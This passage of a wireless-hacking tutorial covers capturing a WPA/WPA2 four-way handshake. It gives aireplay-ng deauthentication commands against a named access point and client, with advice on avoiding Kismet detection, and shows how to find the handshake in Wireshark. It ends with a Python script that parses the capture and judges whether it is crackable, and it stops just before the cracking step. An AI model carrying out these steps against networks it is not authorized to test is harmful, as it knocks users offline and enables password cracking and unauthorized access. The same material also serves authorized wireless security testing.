Passive attacks have the advantage of being undetectable, because they only listen to traffic from the target network. But the four-way handshake is only exchanged when a client (re)associates, so if your target doesn't have a lot of client activity you may wait a long time to capture one. Fortunately, you have the faster, but less stealthy, option of running an active attack.
Using the information we gathered with Kismet during the recon step, we can send the associated client(s) of the target AP forged deauthentication packets. Deauthentication frames carry no authentication in networks without 802.11w management frame protection, so the client(s) obey them and disassociate from the AP. We then listen for the reassociation and the four-way handshake that follows it.
After identifying our target AP with associated clients, we need to set up the wireless hardware for packet injection. The aircrack suite's airmon-ng, a small shell script, does just that.
First bring down the managed VAP (Virtual Access Point) with:
airmon-ng stop ath0
Figure 2: Bringing down the managed interface
Next, start up a VAP in "Monitor" mode:
airmon-ng start wifi0
Figure 3: Creating a monitor mode interface
Now we need to simultaneously deauthenticate a client and capture the resulting reauthentication. Open up two terminal windows. Start airodump-ng in one terminal:
airodump-ng -w capture_file_prefix --channel channel_number interface
airodump-ng -w cap --channel 6 ath0
Figure 4: airodump-ng, up and running
Next, run the deauthentication attack with aireplay-ng in the other terminal:
aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0
Figure 5: A successfully sent deauthentication packet
If all goes well, the client is deauthenticated from the AP and will usually reconnect automatically, producing a fresh four-way handshake. If remaining undetected is important, send a single deauth (a count of 1) and be patient: programs like Kismet flag deauthentication floods, and one burst that looks like ordinary roaming keeps you under the radar.
If the deauthentication was successful, airodump-ng displays a "WPA handshake" notification for the captured reauthentication in its top line (boxed in red in Figure 6).
Figure 6: Successful WPA handshake capture
Finding the Four-way Handshake
To make sure we captured an authentication handshake, we can use the network protocol analyzer Wireshark (formerly Ethereal). Wireshark lets us view packet contents and filter by protocol to pull out the WPA handshake.
Open up Wireshark (Backtrack > Privilege Escalation > Protocol Analysis > Network Sniffers > Wireshark) and open the Kismet capture "dump" file (Kismet-
Using Wireshark, we can filter the captured packets to display only EAPoL packets by entering "eapol" in the filter field (Figure 7).
Figure 7: EAPoL filter applied to captured packets
Here, we're looking for four EAPoL-Key packets whose source alternates AP, client, AP, client: message 1 from the AP carries the ANonce, message 2 from the client carries the SNonce and the first MIC, message 3 from the AP confirms and installs the key, and message 4 from the client acknowledges it (I've highlighted them in red in Figure 7). For the offline attack the material that matters is message 2 plus the ANonce from message 1 or 3, so a capture that missed message 4 is still usable, but one holding only messages 1 and 3 is not.
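As an added example (not from the original article), the following Python script does by hand what airodump-ng's handshake notice and Wireshark's "eapol" filter do: it reads a classic pcap as written by airodump-ng (link type 105, radiotap also accepted), pulls out the EAPOL-Key frames, classifies each as message 1 to 4 from its Key Information flags, checks the AP/client direction and replay counters of a complete exchange, and reports whether enough material is present to attempt a crack. The capture it parses is constructed in memory: the MAC addresses are the ones from the aireplay-ng example above, while the nonces, MIC and RSN IE are placeholder values, and the classification follows the WPA2 flag convention.

```python
"""Locate and sanity-check a WPA/WPA2 four-way handshake in a pcap file."""
import struct

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header for ethertype 0x888E
LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP = 105, 127      # airodump-ng / newer Kismet captures
# EAPOL-Key "Key Information" flag bits (IEEE 802.11i)
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 1 << 3, 1 << 6, 1 << 7, 1 << 8, 1 << 9


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join("%02X" % x for x in b)


def pcap_records(data):
    """Yield raw 802.11 frames from a little-endian classic pcap, stripping radiotap."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    assert magic == 0xA1B2C3D4, "only little-endian classic pcap is handled here"
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack("<IIII", data[off:off + 16])[2]
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if linktype == LINKTYPE_RADIOTAP:
            frame = frame[struct.unpack("<H", frame[2:4])[0]:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError("unsupported link type %d" % linktype)
        yield frame


def parse_eapol_key(frame):
    """Describe a pairwise EAPOL-Key frame, or return None for any other frame."""
    if len(frame) < 24 or (frame[0] >> 2) & 3 != 2:     # type 2 = data frame
        return None
    to_ds, from_ds, qos = frame[1] & 1, (frame[1] >> 1) & 1, (frame[0] >> 4) & 8
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if qos else 0)
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL:
        return None
    eapol = frame[hdr + 8:]
    if len(eapol) < 4 or eapol[1] != 3:                  # EAPOL type 3 = Key
        return None
    body = eapol[4:4 + struct.unpack(">H", eapol[2:4])[0]]
    if len(body) < 95:
        return None
    key_info = struct.unpack(">H", body[1:3])[0]
    if not key_info & KI_PAIRWISE:
        return None                                       # group-key handshake, skip
    key_data_len = struct.unpack(">H", body[93:95])[0]
    if key_info & KI_ACK and not key_info & KI_MIC:
        msg = 1
    elif key_info & KI_ACK and key_info & KI_INSTALL:
        msg = 3
    elif key_info & KI_SECURE or key_data_len == 0:      # WPA1 msg 4 lacks Secure but has no key data
        msg = 4
    else:
        msg = 2
    return {"src": mac_str(frame[10:16]), "dst": mac_str(frame[4:10]),   # addr2 transmits, addr1 receives
            "msg": msg, "replay": struct.unpack(">Q", body[5:13])[0],
            "nonce": body[13:45], "mic": body[77:93]}


def extract_eapol_keys(pcap_bytes):
    """Equivalent of Wireshark's 'eapol' filter, narrowed to pairwise EAPOL-Key frames."""
    return [k for k in (parse_eapol_key(f) for f in pcap_records(pcap_bytes)) if k]


def find_handshake(keys, bssid, client):
    """First complete AP, client, AP, client exchange with paired replay counters, else None."""
    bssid, client = bssid.upper(), client.upper()
    expected = [(1, bssid, client), (2, client, bssid), (3, bssid, client), (4, client, bssid)]
    seq = [k for k in keys if {k["src"], k["dst"]} == {bssid, client}]
    for i in range(len(seq) - 3):
        w = seq[i:i + 4]
        if (all((k["msg"], k["src"], k["dst"]) == e for k, e in zip(w, expected))
                and w[0]["replay"] == w[1]["replay"]
                and w[2]["replay"] == w[3]["replay"] == w[0]["replay"] + 1):
            return w
    return None


def crackable(keys):
    """Offline PSK attack needs message 2 (SNonce + MIC) plus an ANonce from message 1 or 3."""
    msgs = {k["msg"] for k in keys}
    return 2 in msgs and bool(msgs & {1, 3})


def _dot11_data(src, dst, payload, to_ds):
    """Minimal 802.11 data frame; the AP's address doubles as the BSSID."""
    addrs = mac(dst) + mac(src) + mac(dst) if to_ds else mac(dst) + mac(src) + mac(src)
    return bytes([0x08, 0x01 if to_ds else 0x02]) + b"\x00\x00" + addrs + b"\x00\x00" + LLC_SNAP_EAPOL + payload


def _eapol_key(key_info, replay, nonce, mic, key_data):
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, replay) + nonce + bytes(32) + mic
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def build_sample_capture(bssid, client, drop_msg4=False):
    """Constructed pcap: a beacon of noise plus a WPA2 handshake with placeholder nonces and MIC."""
    anonce, snonce, mic, ver = b"\xaa" * 32, b"\x55" * 32, b"\x11" * 16, 2
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    frames = [bytes([0x80, 0]) + b"\x00\x00" + b"\xff" * 6 + mac(bssid) * 2 + b"\x00\x00" + bytes(12),
              _dot11_data(bssid, client, _eapol_key(ver | KI_PAIRWISE | KI_ACK, 1, anonce, bytes(16), b""), False),
              _dot11_data(client, bssid, _eapol_key(ver | KI_PAIRWISE | KI_MIC, 1, snonce, mic, rsn_ie), True),
              _dot11_data(bssid, client, _eapol_key(ver | KI_PAIRWISE | KI_ACK | KI_MIC | KI_INSTALL | KI_SECURE,
                                                    2, anonce, mic, rsn_ie), False),
              _dot11_data(client, bssid, _eapol_key(ver | KI_PAIRWISE | KI_MIC | KI_SECURE, 2, bytes(32), mic, b""), True)]
    if drop_msg4:
        frames.pop()
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_000_000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    BSSID, CLIENT = "00:18:E7:02:4C:E6", "00:13:CE:21:54:14"   # MACs from the aireplay-ng example above
    keys = extract_eapol_keys(build_sample_capture(BSSID, CLIENT))
    for k in keys:
        print("M%d %s -> %s replay=%d" % (k["msg"], k["src"], k["dst"], k["replay"]))
    print("complete handshake:", find_handshake(keys, BSSID, CLIENT) is not None, "crackable:", crackable(keys))
```

To use it on a real capture, replace build_sample_capture with the bytes of the airodump-ng file (cap-01.cap in the example above) and pass the AP and client MACs you targeted. The replay-counter check is strict on purpose: a window that matches on direction and message type but not on counters is usually two interleaved attempts, which is exactly the kind of capture a crack will quietly fail on.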
Now that we've confirmed that we've captured a four-way handshake, it's time to perform the crack.